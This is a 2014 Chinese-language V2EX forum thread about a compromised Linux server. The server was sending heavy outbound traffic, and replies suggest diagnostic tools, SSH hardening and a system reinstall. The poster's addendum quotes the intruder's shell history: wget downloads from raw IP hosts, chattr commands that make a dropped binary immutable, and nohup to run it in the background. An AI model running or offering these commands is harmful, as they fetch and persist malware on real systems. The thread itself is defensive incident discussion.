V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Distributions
Ubuntu
Fedora
CentOS
中文资源站
网易开源镜像站
zhzhwcn
V2EX  ›  Linux

Linux 服务器有大量出站流量 不低于 50M/s 有没有办法查到哪个进程在搞乱

  •  
  •   zhzhwcn · 2014-06-19 11:34:14 +08:00 · 7182 次点击
    这是一个创建于 3841 天前的主题,其中的信息可能已经有所发展或是发生改变。
    用iftop可以看到是几个IP的7000跟7023端口在跑,但是netstat看不到这几个端口 很是奇怪 是不是被黑了
    第 1 条附言  ·  2014-06-19 14:44:40 +08:00
    已证实被人黑了
    1544 uname -a
    1545 ifconfig
    1546 wget http://114.80.119.132:29/ssh_auto_deny.sh
    1547 wget http://122.224.32.32:51/scsi_eh_1
    1548 chattr +i /etc/scsi_eh_1
    1549 chattr +s /etc/scsi_eh_1
    1550 chattr +a /etc/scsi_eh_1
    1551 nohup /etc/scsi_eh_1 > /dev/null 2>&1 &
    1552 chmod 0644 /usr/bin/wget
    1553 get
    1554 wgert
    1555 wget
    把scsi_eh_1这个删除掉就好了
    22 条回复    2014-06-24 21:20:32 +08:00
    ultimate010
        1
    ultimate010  
       2014-06-19 11:36:55 +08:00
    不科学,用root两个看到的应该匹配。
    zhzhwcn
        2
    zhzhwcn  
    OP
       2014-06-19 11:39:24 +08:00
    @ultimate010 所以来这里求帮助 还有没有其它的办法看到进程 查了一下IP都是福建那边的IP
    molinxx
        3
    molinxx  
       2014-06-19 11:40:43 +08:00 via iPhone
    福建莆田的垃圾信息团队么?
    rrfeng
        4
    rrfeng  
       2014-06-19 11:44:56 +08:00
    lsof
    zhzhwcn
        5
    zhzhwcn  
    OP
       2014-06-19 11:47:45 +08:00
    NetHogs version 0.8.0

    PID USER PROGRAM DEV SENT RECEIVED
    3368 root /etc/scsi_eh_1 eth0 0.054 0.092 KB/sec
    2903 root sshd: root@pts/0 eth0 0.147 0.047 KB/sec
    3593 root sshd: root@pts/1 eth0 0.652 0.047 KB/sec
    ? root 106.186.27.187:80-49.65.129.69:62729 0.011 0.023 KB/sec
    ? root 106.186.27.187:10755-117.27.248.5:7000 0.205 0.000 KB/sec
    ? root 106.186.27.187:10754-117.27.248.5:7000 0.204 0.000 KB/sec
    ? root 106.186.27.187:10753-117.27.248.5:7000 0.204 0.000 KB/sec
    ? root 106.186.27.187:10752-117.27.248.5:7000 0.204 0.000 KB/sec
    ? root 106.186.27.187:10751-117.27.248.5:7000 0.203 0.000 KB/sec
    ? root 106.186.27.187:10750-117.27.248.5:7000 0.203 0.000 KB/sec
    ? root 106.186.27.187:10749-117.27.248.5:7000 0.202 0.000 KB/sec
    ? root 106.186.27.187:10748-117.27.248.5:7000 0.202 0.000 KB/sec
    ? root 106.186.27.187:10747-117.27.248.5:7000 0.202 0.000 KB/sec
    ? root 106.186.27.187:10746-117.27.248.5:7000 0.201 0.000 KB/sec
    ? root 106.186.27.187:10745-117.27.248.5:7000 0.201 0.000 KB/sec


    这是NetHogs的输出 pid都是?不知道为什么
    @molinxx
    @rrfeng
    zhzhwcn
        6
    zhzhwcn  
    OP
       2014-06-19 11:51:17 +08:00
    看端口都是连续的 难道是在扫描端口?
    qiuai
        7
    qiuai  
       2014-06-19 12:15:31 +08:00
    我昨天被人扫端口扫了156M带宽.....IP封了一晚....
    Lax
        8
    Lax  
       2014-06-19 13:24:56 +08:00
    iftop或iptraf看看是tcp还是udp
    tywtyw2002
        9
    tywtyw2002  
       2014-06-19 13:26:22 +08:00
    感觉是arp吧

    你试试tcpdump -c 100 看看
    ultimate010
        10
    ultimate010  
       2014-06-19 13:28:03 +08:00
    端口扫描这么吊啊,有没有简单的防范软件。@qiuai
    webflier
        11
    webflier  
       2014-06-19 13:37:19 +08:00
    我把福建省的ip都block了
    XXOO
        12
    XXOO  
       2014-06-19 13:38:15 +08:00
    不是有 ufw 么
    sanddudu
        13
    sanddudu  
       2014-06-19 14:26:27 +08:00
    @webflier 福州的中枪
    不过很多开垃圾评论器的都是莆田的动态 IP
    webflier
        14
    webflier  
       2014-06-19 14:30:43 +08:00
    @sanddudu 而且是n个并发一起来,实在是吃不消啊~
    我本来只封了莆田,但是后来发现福州,厦门也有很多ip过来,所以。。。。。
    sanddudu
        15
    sanddudu  
       2014-06-19 15:20:13 +08:00
    @webflier 我被吃掉了几百 G 的流量
    20150517
        16
    20150517  
       2014-06-19 15:40:52 +08:00 via Android
    前两天也发现一个南宁的ip扫描我22端口,iptables block后,又换了个邻近的ip,现在22端口绝不能开
    zwzmzd
        17
    zwzmzd  
       2014-06-19 15:49:36 +08:00 via Android   ❤️ 1
    @20150517 用iptables杀不干净的
    1.换端口,换个自己记得住,并且10000+的端口很有效
    2.禁止使用密码登录,改用证书登录,特别是root用户。或者干脆禁了root通过ssh登录,要用的时候使用别的账户su进去
    haijd
        18
    haijd  
       2014-06-19 16:39:54 +08:00
    iptraf
    qiuai
        19
    qiuai  
       2014-06-19 18:14:59 +08:00
    @ultimate010 杀IP.也没别的好办法...
    9hills
        20
    9hills  
       2014-06-19 18:50:35 +08:00
    被黑了就备份数据,重装系统。。删掉一个文件接着用?lz真是勇士
    zhzhwcn
        21
    zhzhwcn  
    OP
       2014-06-20 08:35:43 +08:00
    @9hills LZ真是懒人才对
    superbear
        22
    superbear  
       2014-06-24 21:20:32 +08:00
    @molinxx 一直有那边的IP在这边机器发帖
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1040 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 23ms · UTC 19:35 · PVG 03:35 · LAX 11:35 · JFK 14:35
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.